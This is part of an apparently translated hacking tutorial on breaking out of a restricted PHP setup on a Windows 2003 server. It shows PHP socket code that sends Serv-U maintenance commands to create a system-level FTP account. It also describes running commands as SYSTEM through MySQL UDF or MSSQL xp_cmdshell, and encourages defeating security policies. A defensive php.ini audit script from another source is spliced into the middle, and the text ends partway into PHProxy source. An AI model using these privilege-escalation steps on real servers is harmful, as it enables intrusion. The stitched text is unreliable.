
    New Approaches to Breaking Through a win2003 PHP Server (4)

    Category: Windows server issues roundup  Time: 2019-10-11 14:27


      fputs ($fp, "-SpeedLimitUp=-1\r\n");
      fputs ($fp, "-SpeedLimitDown=-1\r\n");
      fputs ($fp, "-MaxNrUsers=-1\r\n");
      fputs ($fp, "-IdleTimeOut=600\r\n");
      fputs ($fp, "-SessionTimeOut=-1\r\n");
      fputs ($fp, "-Expire=0\r\n");
      fputs ($fp, "-RatioUp=1\r\n");
      fputs ($fp, "-RatioDown=1\r\n");
      fputs ($fp, "-RatiosCredit=0\r\n");
      fputs ($fp, "-QuotaCurrent=0\r\n");
      fputs ($fp, "-QuotaMaximum=0\r\n");
      fputs ($fp, "-Maintenance=System\r\n");
      fputs ($fp, "-PasswordType=Regular\r\n");
      fputs ($fp, "-Ratios=None\r\n");
      fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n");
      fputs ($fp, "QUIT\r\n");
      sleep (1);
      while (!feof($fp)) {
          echo fgets ($fp,128);
      }
      }
      ?>
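      fsockopen can also be used to write an HTTP proxy, giving access to the external network or to websites on the local machine that cannot be reached from outside. I have a complete HTTPProxy on hand (Figure 4); the code is fairly long. Interested readers can take a look.
      6. MySQL/MSSQL interface
      Unlike on Linux, MySQL/MSSQL on Windows generally runs as the system administrator, so once you have the root/sa password for the local SQL database, you can connect to the database directly from PHP and execute system commands.
      Executing system commands in MySQL relies on the user-defined function vulnerability known as "MySQL UDF Dynamic Library". In MSSQL, once you are connected to the database you can call the "master..xp_cmdshell" extended procedure directly to execute commands, and the privilege is of course system.
      To summarize: because the system, IIS and PHP versions differ, the breakthrough methods described above may vary. PHP has many more extension features that can be used; step beyond system() and the handful of other command-execution functions, and you may be able to break through the limits of the system's security policy!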
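A defender's check that follows from the summary above, as an added example and not code from the original article: it parses php.ini text and reports which functions remain callable when only the system()-style functions have been blocked. The function groupings and the sample ini fragment are assumptions constructed for illustration.

```python
import re

# Assumed groupings for this example (not from the article): the usual
# command-execution set, plus the socket and database entry points that the
# article's techniques rely on instead.
EXEC_FUNCS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open"}
SOCKET_FUNCS = {"fsockopen", "pfsockopen"}
DB_FUNCS = {"mysql_connect", "mysql_pconnect", "mssql_connect", "mssql_pconnect"}


def parse_disable_functions(ini_text):
    """Return the names in the last effective disable_functions directive."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts a php.ini comment
        m = re.match(r"(?i)disable_functions\s*=\s*(.*)$", line)
        if m:
            value = m.group(1).strip().strip('"')
            # A later directive replaces an earlier one, so overwrite.
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def audit(ini_text):
    """Map each group name to the sorted list of functions still callable."""
    disabled = parse_disable_functions(ini_text)
    groups = {"exec": EXEC_FUNCS, "socket": SOCKET_FUNCS, "database": DB_FUNCS}
    return {name: sorted(funcs - disabled) for name, funcs in groups.items()}


# Constructed sample: a configuration that blocks only command execution.
SAMPLE_INI = """\
; constructed sample php.ini fragment
safe_mode = Off
disable_functions = system, exec, passthru, shell_exec, popen, proc_open
"""

if __name__ == "__main__":
    for group, open_funcs in audit(SAMPLE_INI).items():
        status = "blocked" if not open_funcs else "still callable: " + ", ".join(open_funcs)
        print(f"{group:9s} {status}")
```

The database functions usually cannot be disabled on a site that needs its database, so for that group the controlling mitigations are the database service account's privileges and the protection of the root/sa credentials.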
      The code for proxy.php is attached below:
      <?php
      error_reporting(E_ALL);
      /*
      // This program is free software; you can redistribute it and/or
      // modify it under the terms of the GNU General Public License
      // as published by the Free Software Foundation; either version 2
      // of the License, or (at your option) any later version.
      //
      // This program is distributed in the hope that it will be useful,
      // but WITHOUT ANY WARRANTY; without even the implied warranty of
      // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
      // GNU General Public License for more details.
      //
      // You should have received a copy of the GNU General Public License
      // along with this program; if not, write to the Free Software
      // Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
      //-------------------------------------------------------------------
      // Class: PHProxy
      // Author: ultimategamer00 (Abdullah A.)
      // Last Modified: 6:28 PM 6/22/2004
      */
      // Undo magic_quotes_gpc escaping when that setting is enabled.
      function __stripslashes($str)
      {
          return get_magic_quotes_gpc() ? stripslashes($str) : $str;
      }
      // Fallback for PHP builds that do not provide str_rot13().
      if (!function_exists('str_rot13'))
      {
          function str_rot13($str)
          {
              static $alpha = array('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',
                                    'nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM');
              return strtr($str, $alpha[0], $alpha[1]);